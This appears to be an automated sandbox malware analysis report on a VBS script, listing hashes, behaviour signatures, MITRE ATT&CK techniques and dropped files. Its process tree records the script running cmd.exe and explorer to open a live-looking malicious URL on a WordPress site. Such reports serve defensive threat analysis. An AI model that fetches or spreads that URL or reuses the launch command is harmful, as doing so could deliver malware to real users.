Overview

overview

8

Static

static

1

ec9cc1940f...cf.vbs

windows7-x64

8

ec9cc1940f...cf.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    118s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    21-04-2024 01:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs

  • Size

    27KB

  • MD5

    75ec9f68a5b62705c115db5119a78134

  • SHA1

    6209f948992fd18d4fc6fc6f89d9815369ac8931

  • SHA256

    ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf

  • SHA512

    82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780

  • SSDEEP

    384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2512
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Windows\explorer.exe
        explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
        3⤵
          PID:2612
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2144
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2580
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2580 CREDAT:275457 /prefetch:2
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2540

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      1c31090b50819c568ad318f1cef794d6

      SHA1

      e6139361b246e05d230be28d1249bff5ecdd1cf6

      SHA256

      28bb283a0d1fb89a9638850c69651b5bdf71acf7e8c1afcdf1b8b98f6a88e9d3

      SHA512

      360b9c3bc149b02d5d2d121163293fd3df81af097ae9b111272fb65334072656e3c6403c6bd8de2b5a98e1e52ed24b4b18fdc3a0f699a9254002c950f0fc976d

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      6d1d8d9a72b849dc6f757b2dc1ffef89

      SHA1

      4fbdc13917c7bdbd3cf97a65c044fbfd4beca9ce

      SHA256

      2c4a593102efbcce76f67bbc92d7b52c0949e61b53aa92685f9cba591258bb54

      SHA512

      468b6b0a60248bbf783caa3a7825b400fd490f9f47f4885054ffda61daf22cd362ad76eb30591129b58d0ba7e6fa4bd2225d8c3243fc0dd5d1e2214fc74aec74

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      3504e5b8f81f202c0c59b13facbb7397

      SHA1

      a7ebb8d5f9da764dcb52bfabf210c02f0a32429a

      SHA256

      a7099318befe7d0d6490caff72e56da9458c77b8fa7105fa5b588b8da45a3b70

      SHA512

      34c3afda33fa23daf26ec719337131dafe390d46174bf8c1bcb0823369be5630cd17cff9550076798387758be7cf7e17b7bee1042d76a825de4180dfb30c4bd8

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      7b82bd558674edd1c9133eddd6b2931d

      SHA1

      4e80b614b84d4b23955fa992983cbb3fa9d5bd55

      SHA256

      178330a0219dae40f6e5ba5f801aa7a4585123bf510e165cba13750f345c0891

      SHA512

      d0ab63829d1c34fa0111b8d56d0b3032134fc0ce55412327dc9332d6cb9ba5d3361de45a907f130fd4515c8ebdd88c98c821bb3224ac22c8c69e56739d1f0c40

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      17f239643b2cb1ccbcefc5b6f5673ed6

      SHA1

      11b11aae2beff0aad4e6ccf8a63951a79bb669aa

      SHA256

      34d8ba64f5f22fbdd588145f5887ca6b2e4ff0b568ed5b5f72c350bd57aa0a28

      SHA512

      c3e65413c36bedc3d515eb9484291548013c1af213e955d9a390a4fe60f7fd4e1708c259d8d935b5147e75f1799786af2a0b148789025e1ef69c03eef730938a

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      a7fae553f8e8d8e8e279d17651a30fd8

      SHA1

      5f6df1f3d7d2c1842afd379bf0b7b517653b5db2

      SHA256

      4b4ececbab387b8580fcf446047ba6171179dd4e55804d722bf778125710973e

      SHA512

      b7391d5ee462fe2120e1564c6715951623dc71a2382bf17f58dd31f19d546b3d09e2eb615b2ead0b305422f425605874f7bcd84b1b734d6623d7392e505f4af4

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      1e7864a6d5a27aead6797229404f9827

      SHA1

      7822b72097642fe4eb1d56700a8ddd8fd336f77b

      SHA256

      037bad180a48a110a19d5ccfcf304391b02b37b7a600916db365a4ac22ffc88b

      SHA512

      b6018fc75b25805112d1820fca83cc6f9fc1db975c5325139fa6aa42c77f8f82ba0b5ff7fc7b476e092022d969cc6cdd42059ed659d39d6f6c6f91bdecaaf939

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      41b7ccee445d26c849f08b669f5ca290

      SHA1

      0725665fca956ce826962dea7b77d0822ff4d883

      SHA256

      bb28dee398a9330464d880f3dadd642f8b903fa9fd06ac1409d716c040f93049

      SHA512

      d4986152120985d685c43140ef70b2e390993bfa72dce6b8d2753bc0c5b38cee6e0ad822b6b01398ff1de0794642b3ae4bc9a5c2905448eac6d5a946868ce06c

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      79dba776f5cb159aca7bd8a01c30585f

      SHA1

      b679e1d79421f64f43ad989293bf9705e8762046

      SHA256

      19eeea64dbf0fc54c3de8b9f48c3cb29bd108fdc592476f07688da5258625676

      SHA512

      97978622ff771df8cd8776d1b0f1bd751588485c48deacc1e3e366a6bfb38a684812664beb044dadb16597a6754ed41f9d4bc89a292c63e37eb64315af4382dc

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      37bc0736aee7402655bc0b2b77a80244

      SHA1

      56f6e83cba0da939c4caa4acbb63e4ee1d4f8d61

      SHA256

      714a658db5c82d7897da90e354431156c324e82420ffab2478cc68e4ababb58b

      SHA512

      674c77e717d27a85bc86687bef396924cd08513d7ff1e9d79e1d0b185bc1ddbdea65483bd904ee91978421120d8fb165fc7e31f4901c709f61e2d201eb3d1c27

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      02c0c436f9ab4d0d10e94f6f66a9f95c

      SHA1

      1f0410f920a922e8f9701b51e236f6b5cff748a4

      SHA256

      789c1b1cb4acd8caeca5f793ea8b2f8bf3f6d759551fedfea2d352398d19f74f

      SHA512

      ac79902c9c3a86c06d8f06d1073b32937a130deba211f912248031066a54d6575423f559fbc7d8350c548d65c0dda84fca4eee76a2968ddef1f18ea093faa8d3

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      81f63ca81cb296d0cf319098b932e145

      SHA1

      ea6fa7ace0498809fd8f576053d34c89b81782b9

      SHA256

      5cebf15c0994a034e55899da1bbf382c2ed9d18de9038704205be32630de8bd4

      SHA512

      d50ae0f1dc518c11e9e685dc981dcb0d597316c8009d70b903da42414715da888125f5e62640469de294c5980aed81a7f6fba0819fc8131ae1450b647de31270

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Cab4CAC.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Tar5960.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      Download Submit